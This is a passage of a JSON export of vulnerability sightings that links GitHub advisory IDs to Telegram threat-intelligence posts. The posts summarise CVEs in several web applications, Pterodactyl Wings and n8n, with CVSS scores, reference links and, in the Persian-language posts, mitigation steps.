"2025-01-06T00:35:52.000000Z"}, {"uuid": "9e7a8cc1-8476-437f-8be0-c30c2c903ca9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWGW-G9F5-GHW2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/144", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-pwgw-g9f5-ghw2\n\ud83d\udd17 Aliases: CVE-2025-0233\n\ud83d\udd39 Details: A vulnerability was found in Codezips Project Management System 1.0. It has been classified as critical. This affects an unknown part of the file /pages/forms/course.php. The manipulation of the argument course_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T00:30:41Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T00:30:41Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-74\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0233\n2. https://github.com/104923869/CVE/issues/1\n3. https://vuldb.com/?ctiid.290229\n4. https://vuldb.com/?id.290229\n5. https://vuldb.com/?submit.4463", "creation_timestamp": "2025-01-06T00:35:51.000000Z"}, {"uuid": "a0164f56-b055-432f-977f-dcf6c69d6b41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q7WX-V3RG-FJVX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/143", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-q7wx-v3rg-fjvx\n\ud83d\udd17 Aliases: CVE-2024-13142\n\ud83d\udd39 Details: A vulnerability was found in ZeroWdd studentmanager 1.0. It has been declared as problematic. This vulnerability affects the function submitAddRole of the file src/main/java/com/zero/system/controller/RoleController. java. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T00:30:41Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T00:30:41Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13142\n2. https://github.com/ZeroWdd/manager-system/issues/6\n3. https://vuldb.com/?ctiid.290230\n4. https://vuldb.com/?id.290230\n5. https://vuldb.com/?submit.469213", "creation_timestamp": "2025-01-06T00:35:49.000000Z"}, {"uuid": "f48ce6ec-9cf9-48ed-b6db-325cd08db044", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5V2-8PM5-G9WP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/141", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c5v2-8pm5-g9wp\n\ud83d\udd17 Aliases: CVE-2025-0229\n\ud83d\udd39 Details: A vulnerability, which was classified as critical, has been found in code-projects Travel Management System 1.0. This issue affects some unknown processing of the file /enquiry.php. The manipulation of the argument pid/t1/t2/t3/t4/t5/t6/t7 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T21:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T21:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-74\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0229\n2. https://code-projects.org\n3. https://github.com/Huandtx/cve/blob/main/cve/sql1.md\n4. https://vuldb.com/?ctiid.290225\n5. https://vuldb.com/?id.290225\n6. https://vuldb.com/?submit.4452", "creation_timestamp": "2025-01-05T21:37:00.000000Z"}, {"uuid": "e56d3c24-439a-42f6-9d63-a871b3d1f85b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HVJ6-6HH6-HG48", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/140", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-hvj6-6hh6-hg48\n\ud83d\udd17 Aliases: CVE-2025-0230\n\ud83d\udd39 Details: A vulnerability, which was classified as critical, was found in code-projects Responsive Hotel Site 1.0. Affected is an unknown function of the file /admin/print.php. The manipulation of the argument pid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T21:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T21:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-74\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0230\n2. https://code-projects.org\n3. https://github.com/Huandtx/cve/blob/main/cve/Responsive20Hotel20Site/sql1.md\n4. https://vuldb.com/?ctiid.290226\n5. https://vuldb.com/?id.290226\n6. https://vuldb.com/?submit.44581", "creation_timestamp": "2025-01-05T21:36:49.000000Z"}, {"uuid": "1067d33e-ee32-4b98-ad45-7b25f905a50b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C797-JX9V-F674", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/149", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c797-jx9v-f674\n\ud83d\udd17 Aliases: CVE-2024-12311\n\ud83d\udd39 Details: The Email Subscribers by Icegram Express  WordPress plugin before 5.7.44 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:46Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12311\n2. https://wpscan.com/vulnerability/5e00ba3-daf-403-a0b9-6523696fbdd", "creation_timestamp": "2025-01-06T06:40:11.000000Z"}, {"uuid": "dcb31f1e-2589-401f-87c1-64b99f44dc97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5J8-58V3-G23G", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/57", "content": "\ud83d\udccc **CVE ID**: GHSA-r5j8-58v3-g23g\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4168\n2. https://www.ibm.com/support/pages/node/180202", "creation_timestamp": "2025-01-05T01:32:53.000000Z"}, {"uuid": "bf5aeb1d-c218-4d42-bc13-5514024abd04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87R4-WG36-7X2V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/61", "content": "\ud83d\udccc **CVE ID**: GHSA-87r4-wg36-7x2v\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4165\n2. https://www.ibm.com/support/pages/node/180201", "creation_timestamp": "2025-01-05T01:33:15.000000Z"}, {"uuid": "46fb89d0-1896-4251-8172-236e27f3c234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99Q4-QXP3-PJPM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/60", "content": "\ud83d\udccc **CVE ID**: GHSA-99q4-qxp3-pjpm\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-020\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/d10dfaebae5c8dbe54ad83d6325d81\n4. https://vuldb.com/?ctiid.290144\n5. https://vuldb.com/?id.290144\n6. https://vuldb.com/?submit.44035", "creation_timestamp": "2025-01-05T01:33:11.000000Z"}, {"uuid": "b9f22341-4dee-4ea3-843a-e30d84e1e684", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CW42-CP8C-QV2Q", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/59", "content": "\ud83d\udccc **CVE ID**: GHSA-cw42-cp8c-qv2q\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-416\n2. https://www.ibm.com/support/pages/node/180199", "creation_timestamp": "2025-01-05T01:33:05.000000Z"}, {"uuid": "c5e96c54-2d0a-4fa6-b442-c2e579c9e634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P744-4Q6P-HVC2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3017", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32080\n\ud83d\udd39 Description: Wings is the server control plane for Pterodactyl Panel. A vulnerability affecting versions prior to 1.7.5 and versions 1.11.0 prior to 1.11.6 impacts anyone running the affected versions of Wings.  This vulnerability can be used to gain access to the host system running Wings if a user is able to modify an server's install script or the install script executes code supplied by the user (either through environment variables, or commands that execute commands based off of user data). This vulnerability has been resolved in version `v1.11.6` of Wings, and has been back-ported to the 1.7 release series in `v1.7.5`. Anyone running `v1.11.x` should upgrade to `v1.11.6` and anyone running `v1.7.x` should upgrade to `v1.7.5`.\n\nThere are no workarounds aside from upgrading. Running Wings with a rootless container runtime may mitigate the severity of any attacks, however the majority of users are using container runtimes that run as root as per the Wings documentation. SELinux may prevent attackers from performing certain operations against the host system, however privileged containers have a lot of freedom even on systems with SELinux enabled.\n\nIt should be noted that this was a known attack vector, for attackers to easily exploit this attack it would require compromising an administrator account on a Panel.  However, certain eggs (the data structure that holds the install scripts that get passed to Wings) have an issue where they are unknowingly executing shell commands with escalated privileges provided by untrusted user data.\n\ud83d\udccf Published: 2023-05-10T20:07:16.646Z\n\ud83d\udccf Modified: 2025-01-24T20:59:19.820Z\n\ud83d\udd17 References:\n1. https://github.com/pterodactyl/wings/security/advisories/GHSA-p744-4q6p-hvc2\n2. https://github.com/pterodactyl/wings/releases/tag/v1.11.6\n3. https://github.com/pterodactyl/wings/releases/tag/v1.17.5", "creation_timestamp": "2025-01-24T21:05:07.000000Z"}, {"uuid": "d2592ff3-3139-40c0-a56a-840a29614ab0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V98V-FF95-F3CP", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/1371", "content": "\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u067e\u0644\u062a\u0641\u0631\u0645 \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u06af\u0631\u062f\u0634 \u06a9\u0627\u0631 N8n \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06a9\u0646\u062a\u0631\u0644 \u0646\u0627\u06a9\u0627\u0641\u06cc \u0645\u0646\u0627\u0628\u0639 \u0628\u0627 \u0645\u062f\u06cc\u0631\u06cc\u062a \u067e\u0648\u06cc\u0627 \u0627\u0633\u062a. \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u062c\u0627\u0632\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0628\u0647 \u067e\u0644\u062a\u0641\u0631\u0645 \u0631\u0627 \u0628\u062f\u0647\u062f.\n\nBDU:2025-16183\nCVE-2025-68613\n\n\u0646\u0635\u0628 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627 \u0627\u0632 \u0645\u0646\u0627\u0628\u0639 \u0645\u0639\u062a\u0628\u0631. \u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0634\u0631\u0627\u06cc\u0637 \u0645\u0648\u062c\u0648\u062f\u060c \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631\u06cc \u062a\u0646\u0647\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u062a\u0645\u0627\u0645\u06cc \u0631\u06cc\u0633\u06a9\u200c\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0646\u0635\u0628 \u0634\u0648\u0646\u062f.\n\n\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u062c\u0628\u0631\u0627\u0646\u06cc:\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0631\u0648\u0627\u0644 \u0628\u0631\u0627\u06cc \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0647 \u067e\u0644\u062a\u0641\u0631\u0645 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u061b\n- \u0628\u062e\u0634\u200c\u0628\u0646\u062f\u06cc \u0634\u0628\u06a9\u0647 \u0628\u0631\u0627\u06cc \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u067e\u0644\u062a\u0641\u0631\u0645 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u061b\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u0634\u062e\u06cc\u0635 \u0648 \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0646\u0641\u0648\u0630 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc (\u06a9\u0634\u0641\u060c \u062b\u0628\u062a) \u0648 \u0648\u0627\u06a9\u0646\u0634 \u0628\u0647 \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u061b\n- \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc/\u062d\u0630\u0641 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u06cc \u0628\u0644\u0627\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u061b\n- \u062d\u062f\u0627\u0642\u0644 \u06a9\u0631\u062f\u0646 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646\u061b\n- \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 \u0627\u0632 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc (\u0627\u06cc\u0646\u062a\u0631\u0646\u062a).\n\n\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u0648\u0635\u06cc\u0647\u200c\u0647\u0627\u06cc \u062a\u0648\u0644\u06cc\u062f\u06a9\u0646\u0646\u062f\u0647:\n\u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u0628\u0647 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc 1.120.4\u060c 1.121.1\u060c 1.122.0:\nhttps://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp\n\ud83d\udca1\u0627\u06af\u0631 \u0627\u06cc\u0646 \u0645\u062a\u0646 \u062f\u06cc\u062f\u06af\u0627\u0647 \u0634\u0645\u0627 \u0631\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0627\u062f\u060c \u0628\u0627\u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u06cc\u062f. \n\ud83c\udfed\u00a0 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n@pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u06af\u0631\u0648\u0647 \u062a\u0644\u06af\u0631\u0627\u0645 :\nhttps://t.me/ICSCERT_IR", "creation_timestamp": "2025-12-29T15:34:42.000000Z"}, {"uuid": "4d05987a-726e-4526-832b-d590d96d770e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-62R4-HW23-CC8V", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/1394", "content": "\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0639\u0645\u0644\u06a9\u0631\u062f Code Node \u062f\u0631 \u067e\u0644\u062a\u0641\u0631\u0645 \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u06af\u0631\u062f\u0634 \u06a9\u0627\u0631 N8n \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0646\u0642\u0636 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u062d\u0641\u0627\u0638\u062a \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0627\u0633\u062a. \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u062c\u0627\u0632\u0647 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0628\u062f\u0647\u062f.\n\nCVE-2025-68668\n\n\u0646\u0635\u0628 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627 \u0627\u0632 \u0645\u0646\u0627\u0628\u0639 \u0645\u0639\u062a\u0628\u0631. \u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0634\u0631\u0627\u06cc\u0637 \u0645\u0648\u062c\u0648\u062f\u060c \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631\u06cc \u062a\u0646\u0647\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u062a\u0645\u0627\u0645\u06cc \u0631\u06cc\u0633\u06a9\u200c\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0646\u0635\u0628 \u0634\u0648\u0646\u062f.\n\n\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u062c\u0628\u0631\u0627\u0646\u06cc:\n- \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0639\u0645\u0644\u06a9\u0631\u062f Code Node\u061b\n- \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0646\u0648\u0634\u062a\u0646 \u0648 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u067e\u0627\u06cc\u062a\u0648\u0646 \u0628\u0627 \u062a\u0646\u0638\u06cc\u0645 \u0645\u0642\u062f\u0627\u0631 false \u0628\u0631\u0627\u06cc \u0645\u062a\u063a\u06cc\u0631 N8N_PYTHON_ENABLED\u061b\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u0641\u0627\u06cc\u0631\u0648\u0627\u0644 \u0628\u0631\u0627\u06cc \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0647 \u067e\u0644\u062a\u0641\u0631\u0645 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u061b\n- \u0628\u062e\u0634\u200c\u0628\u0646\u062f\u06cc \u0634\u0628\u06a9\u0647 \u0628\u0631\u0627\u06cc \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u067e\u0644\u062a\u0641\u0631\u0645 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u061b\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u0634\u062e\u06cc\u0635 \u0648 \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0646\u0641\u0648\u0630 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc (\u06a9\u0634\u0641\u060c \u062b\u0628\u062a) \u0648 \u0648\u0627\u06a9\u0646\u0634 \u0628\u0647 \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u061b\n- \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc/\u062d\u0630\u0641 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u06cc \u0628\u0644\u0627\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u061b\n- \u062d\u062f\u0627\u0642\u0644 \u06a9\u0631\u062f\u0646 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646\u061b\n- \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u067e\u0644\u062a\u0641\u0631\u0645 \u0627\u0632 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc (\u0627\u06cc\u0646\u062a\u0631\u0646\u062a).\n\n\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u0648\u0635\u06cc\u0647\u200c\u0647\u0627:\nhttps://github.com/n8n-io/n8n/security/advisories/GHSA-62r4-hw23-cc8v\n\ud83d\udca1\u0627\u06af\u0631 \u0627\u06cc\u0646 \u0645\u062a\u0646 \u062f\u06cc\u062f\u06af\u0627\u0647 \u0634\u0645\u0627 \u0631\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0627\u062f\u060c \u0628\u0627\u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u06cc\u062f. \n\ud83c\udfed\u00a0 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n@pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u06af\u0631\u0648\u0647 \u062a\u0644\u06af\u0631\u0627\u0645 :\nhttps://t.me/ICSCERT_IR\n\u0627\u06cc\u062a\u0627:\nhttps://eitaa.com/joinchat/1866007784Cfd023f90b2\n\u06af\u0631\u0648\u0647 \u062a\u062e\u0635\u0635\u06cc \u0648\u0627\u062a\u0633 \u0627\u067e:\nhttps://chat.whatsapp.com/BZu1yr1aeHpCDxiIXotzyW?mode=ac_t\n\u0628\u0647 \u0627\u0646\u062c\u0645\u0646 \u062a\u062e\u0635\u0635\u06cc AI.Sec :\nhttps://chat.whatsapp.com/KRPUA6WM4f6AdS727vRBmM?mode=ems_copy_t\n\u06a9\u0627\u0646\u0627\u0644 \u0628\u0644\u0647\nhttps://ble.ir/otsec", "creation_timestamp": "2026-01-30T19:25:37.000000Z"}, {"uuid": "ada3a9e8-d354-4554-a0be-51264afc6250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85GG-89QV-8PVC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/62", "content": "\ud83d\udccc **CVE ID**: GHSA-85gg-89qv-8pvc\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0210\n2. https://github.com/shaturo133/POCs/blob/main/Blind20SQL20Injection20in20School20Faculty20Scheduling20System.md\n3. https://vuldb.com/?ctiid.290155\n4. https://vuldb.com/?id.290155\n5. https://vuldb.com/?submit.44112\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:33:22.000000Z"}, {"uuid": "d8085796-a38d-4a47-af98-c29eeb85e036", "vulnerability_lookup_origin": 